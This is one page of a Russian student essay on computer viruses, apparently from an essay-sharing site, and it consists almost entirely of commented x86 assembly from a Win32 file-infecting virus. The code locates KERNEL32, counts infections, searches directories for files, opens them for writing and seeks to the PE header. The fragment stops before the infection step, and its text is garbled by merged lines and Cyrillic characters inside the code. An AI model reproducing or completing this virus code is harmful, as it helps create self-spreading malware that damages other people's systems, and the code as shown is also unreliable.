Компьютерные вирусы
| Категория реферата: Рефераты по информатике, программированию
| Теги реферата: реферат на тему образ жизни, сочинение язык
| Добавил(а) на сайт: Jeshman.
Предыдущая страница реферата | 4 5 6 7 8 9 10 11 12 13 14 | Следующая страница реферата
;KERNEL найден, точка 2
mov eax,[ebp+offset kern2] jmp movit
;Точка 2 не подошла, проверим точку 1 notkern2:
; Возьмем адрес первой известной нам точки KERNEL mov eax,[ebp+offset kern1]
;Проверим ключ, если ключа нет - выходим cmp dword ptr [eax],5350FC9Ch jnz nopayload
;KERNEL найден, точка 1
mov eax,[ebp+offset kern1]
;KERNEL найден, адрес точки входа находится в регистре EAX movit:
;Сохраним адрес KERNEL mov [ebp+offset kern],eax cld
;3апомним текущую директорию lea eax, [ebp+offset orgdir] push eax push 255 call GetCurDir
;Инициализируем счетчик заражений
mov byte ptr [ebp+offset countinfect],0
;Ищем первый файл infectdir:
lea eax, [ebp+offset win32_data_thang] push eax lea eax, [ebp+offset fname] push eax call FindFile
;Сохраним индекс для поиска
mov dword ptr [ebp+offset searchhandle],eax
Проверим, найден ли файл. Если файл не найден,
;меняем директорию
cmp еах,-1 jz foundnothing
;0ткроем файл для чтения и записи gofile: push О push dword ptr [ebp+offset fileattr] ;FILE_ATTRIBUTE_NORMAL push 3 ;OPEN_EXISTING push 0 push 0 push 80000000h+40000000h ;GENERIC_READ+GENERIC_WRITE lea eax, [ebp+offset fullname] push eax call CreateFile
;Сохраним описатель файла
mov dword ptr [ebp+offset ahand],eax
;Проверим, не произошла ли ошибка.
;Если ошибка произошла, ищем следующий файл
сmр еах,-1 jz findnextone
;Доставим указатель позиции чтения/записи на поле
;со смещением РЕ-заголовка
push О push О push 3Ch push dword ptr [ebp+offset ahand] call SetFilePointer
Рекомендуем скачать другие рефераты по теме: контрольная, использование рефератов.
Категории:
Предыдущая страница реферата | 4 5 6 7 8 9 10 11 12 13 14 | Следующая страница реферата